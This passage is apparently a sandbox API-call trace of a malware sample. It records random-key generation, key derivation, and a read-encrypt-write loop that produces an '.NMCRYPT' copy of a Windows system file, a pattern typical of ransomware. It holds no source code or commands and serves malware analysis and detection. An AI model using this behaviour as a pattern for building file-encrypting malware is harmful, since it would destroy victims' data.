out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.113] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.113] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.114] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0160.114] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.114] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad2f8) returned 1 [0160.114] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.114] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.114] wcslen (_String="\\\\?\\") returned 0x4 [0160.114] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7b8) returned 1 [0160.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.115] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.115] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.116] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.117] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.117] GetLastError () returned 0x0 [0160.117] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.118] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.118] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.118] GetLastError () returned 0x0 [0160.118] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.118] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.119] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.119] GetLastError () returned 0x0 [0160.119] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.119] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.119] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.119] GetLastError () returned 0x0 [0160.119] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.119] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.119] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.119] GetLastError () returned 0x0 [0160.119] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.119] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.119] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.119] GetLastError () returned 0x0 [0160.119] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.119] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.119] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.119] GetLastError () returned 0x0 [0160.119] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.119] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.119] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.119] GetLastError () returned 0x0 [0160.119] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.120] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.120] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.120] GetLastError () returned 0x0 [0160.120] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.120] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.120] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.120] GetLastError () returned 0x0 [0160.120] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.120] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.120] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.120] GetLastError () returned 0x0 [0160.120] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.120] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.120] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.120] GetLastError () returned 0x0 [0160.120] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.120] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.120] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.120] GetLastError () returned 0x0 [0160.120] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.120] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.120] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.120] GetLastError () returned 0x0 [0160.120] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.121] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.121] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.121] GetLastError () returned 0x0 [0160.121] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.121] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.121] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.121] GetLastError () returned 0x0 [0160.121] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.121] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.121] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.121] GetLastError () returned 0x0 [0160.121] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.121] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.121] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.121] GetLastError () returned 0x0 [0160.121] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.121] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.121] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.121] GetLastError () returned 0x0 [0160.121] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.121] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.122] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.122] GetLastError () returned 0x0 [0160.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.122] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.122] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.122] GetLastError () returned 0x0 [0160.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.122] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.122] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.122] GetLastError () returned 0x0 [0160.122] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.122] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.122] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.122] GetLastError () returned 0x0 